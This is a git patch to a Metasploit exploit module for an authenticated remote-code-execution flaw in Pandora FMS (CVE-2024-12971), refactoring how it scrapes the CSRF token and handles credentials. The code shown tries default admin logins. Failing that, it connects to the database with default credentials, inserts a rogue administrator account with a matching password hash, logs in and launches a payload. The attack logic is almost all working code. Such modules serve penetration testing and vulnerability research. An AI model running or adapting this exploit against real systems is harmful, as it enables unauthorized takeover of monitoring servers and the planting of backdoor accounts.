From 40ba981c982aac9222d1ee7a3aa7cc8a1efbcdfd Mon Sep 17 00:00:00 2001
From: h00die-gr3y <h00die.gr3y@gmail.com>
Date: Mon, 7 Apr 2025 14:29:51 +0000
Subject: [PATCH] update based on reviewer suggestions

---
 .../pandora_fms_auth_rce_cve_2024_12971.rb    | 39 +++++++++++--------
 1 file changed, 23 insertions(+), 16 deletions(-)

diff --git a/modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_12971.rb b/modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_12971.rb
index c17507399f..98c83b26ac 100644
--- a/modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_12971.rb
+++ b/modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_12971.rb
@@ -181,8 +181,15 @@ class MetasploitModule < Msf::Exploit::Remote
     # scrape <input id="hidden-csrf_code" name="csrf_code" type="hidden"  value="d3ec1cae43fba8259079038548093ba8" />
     html = res.get_html_document
     csrf_code_html = html.at('input[@id="hidden-csrf_code"]')
-    vprint_status("csrf_code: #{csrf_code_html}")
-    csrf_code = csrf_code_html.attribute_nodes[3] unless csrf_code_html.nil? || csrf_code_html.blank?
+    vprint_status("csrf_code_html: #{csrf_code_html}")
+
+    csrf_attributes = csrf_code_html&.attributes
+    return false unless csrf_attributes
+
+    csrf_code = csrf_attributes['value']
+    return false unless csrf_code
+
+    vprint_status("csrf_code: #{csrf_code}")
 
     # second login POST request using the csrf code
     # csrf_code can be nil in older versions where the csrf_code is not implemented
@@ -315,18 +322,18 @@ class MetasploitModule < Msf::Exploit::Remote
     @vuln_path_setting = 'chromium_path' if @vuln_path_setting.nil?
 
     # check if we can login at the Pandora Web application with the default admin credentials
-    @username = datastore['USERNAME']
-    @password = datastore['PASSWORD']
-    print_status("Trying to log in with admin credentials #{@username}:#{@password} at the Pandora FMS Web application.")
-    unless pandora_login(@username, @password)
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    print_status("Trying to log in with admin credentials #{username}:#{password} at the Pandora FMS Web application.")
+    unless pandora_login(username, password)
       # connect to the PostgreSQL DB with default credentials
       print_status('Logging in with admin credentials failed. Trying to connect to the Pandora MySQL server.')
       mysql_login_res = mysql_login(datastore['RHOSTS'], datastore['DB_USER'], datastore['DB_PASSWORD'], datastore['DB_NAME'], datastore['DB_PORT'])
       fail_with(Failure::Unreachable, "Unable to connect to the MySQL server on port #{datastore['DB_PORT']}.") unless mysql_login_res
 
       # add a new admin user
-      @username = Rex::Text.rand_text_alphanumeric(5..8).downcase
-      @password = Rex::Text.rand_password
+      username = Rex::Text.rand_text_alphanumeric(5..8).downcase
+      password = Rex::Text.rand_password
 
       # check the password hash algorithm by reading the password hash of the admin user
       # new pandora versions hashes the password in bcrypt $2*$, Blowfish (Unix) format else it is a plain MD5 hash
@@ -334,23 +341,23 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::BadConfig, 'Cannot find admin credentials to determine password hash algorithm.') if mysql_query_res == false || mysql_query_res.size != 1
       hash = mysql_query_res.fetch_hash
       if hash['password'].match(/^\$2.\$/)
-        password_hash = Password.create(@password)
+        password_hash = Password.create(password)
       else
-        password_hash = Digest::MD5.hexdigest(@password)
+        password_hash = Digest::MD5.hexdigest(password)
       end
-      print_status("Creating new admin user with credentials #{@username}:#{@password} for access at the Pandora FMS Web application.")
-      mysql_query_res = mysql_query("INSERT INTO tusuario (id_user, password, is_admin) VALUES (\'#{@username}\', \'#{password_hash}\', '1');")
-      fail_with(Failure::BadConfig, "Adding new admin credentials #{@username}:#{@password} to the database failed.") if mysql_query_res == false
+      print_status("Creating new admin user with credentials #{username}:#{password} for access at the Pandora FMS Web application.")
+      mysql_query_res = mysql_query("INSERT INTO tusuario (id_user, password, is_admin) VALUES (\'#{username}\', \'#{password_hash}\', '1');")
+      fail_with(Failure::BadConfig, "Adding new admin credentials #{username}:#{password} to the database failed.") if mysql_query_res == false
 
       # log in with the new admin user credentials at the Pandora FMS Web application
-      print_status("Trying to log in with new admin credentials #{@username}:#{@password} at the Pandora FMS Web application.")
-      fail_with(Failure::NoAccess, 'Failed to authenticate at the Pandora FMS application.') unless pandora_login(@username, @password)
+      print_status("Trying to log in with new admin credentials #{username}:#{password} at the Pandora FMS Web application.")
+      fail_with(Failure::NoAccess, 'Failed to authenticate at the Pandora FMS application.') unless pandora_login(username, password)
     end
     print_status('Succesfully authenticated at the Pandora FMS Web application.')
 
     # storing credentials at the msf database
     print_status('Saving admin credentials at the msf database.')
-    store_valid_credential(user: @username, private: @password)
+    store_valid_credential(user: username, private: password)
 
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     case target['Type']